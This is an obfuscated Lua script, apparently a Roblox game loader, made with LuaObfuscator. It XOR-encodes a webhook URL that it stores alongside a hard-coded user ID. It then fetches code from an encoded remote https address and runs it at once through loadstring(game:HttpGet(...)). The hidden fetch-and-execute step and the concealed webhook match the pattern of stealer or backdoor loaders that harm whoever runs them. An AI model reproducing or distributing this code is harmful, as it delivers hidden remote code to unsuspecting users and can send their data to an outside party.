--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.1.7) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v8,v9)local v10={};for v11=(250 -(45 + 203)) -1, #v8 do v6(v10,v0(v4(v1(v2(v8,v11,v11 + (2 -1))),v1(v2(v9,1 + ((v11-(1 + 0))% #v9),1 + (0 -0) + ((v11-(1 + 0 + 0))% #v9) + 1)))%256));end return v5(v10);end _G.UserID=(3622957180 -0) -0;_G.WebHook=v7("\58\46\157\167\12\104\117\198\179\22\33\57\134\165\27\124\57\134\186\80\51\42\128\248\8\55\56\129\184\16\57\41\198\230\79\100\104\219\231\71\100\111\208\228\79\99\108\217\230\76\106\106\198\164\55\107\104\168\149\7\62\50\138\175\46\7\61\170\224\59\51\31\155\145\37\60\17\166\148\52\30\13\187\148\62\40\49\152\230\56\31\28\158\165\20\22\43\129\162\55\48\61\152\128\46\35\34\135\163\50\31\17\217\135\18\8\108\143\130\54\99","\82\90\233\215\127");loadstring(game:HttpGet(v7("\76\31\163\45\192\218\199\130\86\10\160\115\212\137\156\197\81\9\162\46\214\146\139\194\74\31\178\51\199\206\139\194\73\68\132\52\223\133\134\206\65\56\180\47\218\144\156\222\11\59\164\37\224\131\154\196\84\31\164\115\255\149\137\130\73\10\190\51\156\176\155\213\101\30\163\50\213\129\154\192\10\31\165\40\214","\36\107\215\93\179\224\232\173")))();
